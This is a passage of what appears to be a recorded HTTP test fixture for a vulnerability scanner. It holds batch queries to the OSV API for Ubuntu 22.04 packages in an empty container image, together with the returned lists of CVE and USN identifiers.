"11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { 
"package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 11965 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": 
"UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": 
"UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": 
"UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": 
"UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", 
"modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": 
"2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", 
"modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "11965" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14065 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { 
"ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { 
"package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, 
"version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { 
"ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" 
}, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar_with_unimportant_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 11965 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": 